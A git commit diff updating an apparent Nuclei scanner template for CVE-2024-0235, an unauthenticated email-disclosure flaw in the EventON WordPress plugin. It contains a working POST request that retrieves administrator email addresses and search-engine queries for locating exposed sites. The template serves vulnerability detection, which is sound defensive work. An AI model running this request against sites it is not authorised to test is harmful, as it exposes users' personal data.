update matcher

patch-1
Dhiyaneshwaran 2024-04-28 14:47:42 +05:30 committed by GitHub
parent bd4ead957c
commit a1a1b3f4cd
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 14 additions and 5 deletions

View File

@ -1,10 +1,11 @@
id: CVE-2024-0235 id: CVE-2024-0235
info: info:
name: EventON WordPress Plugin Unauthorized Email Access name: EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure
author: princechaddha author: princechaddha
severity: medium severity: medium
description: The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog. description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
impact: | impact: |
An attacker could potentially access sensitive email information. An attacker could potentially access sensitive email information.
remediation: | remediation: |
@ -18,7 +19,7 @@ info:
cve-id: CVE-2024-0235 cve-id: CVE-2024-0235
cwe-id: CWE-862 cwe-id: CWE-862
epss-score: 0.00052 epss-score: 0.00052
epss-percentile: 0.19212 epss-percentile: 0.19233
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
metadata: metadata:
vendor: myeventon vendor: myeventon
@ -26,7 +27,8 @@ info:
framework: wordpress framework: wordpress
shodan-query: vuln:CVE-2023-2796 shodan-query: vuln:CVE-2023-2796
fofa-query: wp-content/plugins/eventon/ fofa-query: wp-content/plugins/eventon/
tags: cve,cve2024,wp,wordpress,unauth,exposure publicwww-query: "wp-content/plugins/eventon/"
tags: cve,cve2024,wp,wordpress,unauth,exposure,eventon,wpscan
http: http:
- method: POST - method: POST
@ -38,8 +40,15 @@ http:
body: "_user_role=administrator" body: "_user_role=administrator"
matchers-condition: and
matchers: matchers:
- type: word - type: word
words: words:
- "@" - '@'
- '"status":'
- '"content":'
part: body part: body
- type: status
status:
- 200